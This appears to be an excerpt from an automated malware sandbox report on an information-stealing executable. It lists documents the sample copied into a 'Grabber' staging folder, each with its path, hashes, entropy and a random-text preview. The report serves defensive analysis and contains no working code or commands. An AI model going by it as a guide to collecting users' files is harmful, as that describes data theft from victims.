Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\TQDGENUHWP\TQDGENUHWP.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\TQDGENUHWP\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZSSZYEFYMU.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZSSZYEFYMU.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\AFWAAFRXKO.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Downloads\AFWAAFRXKO.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

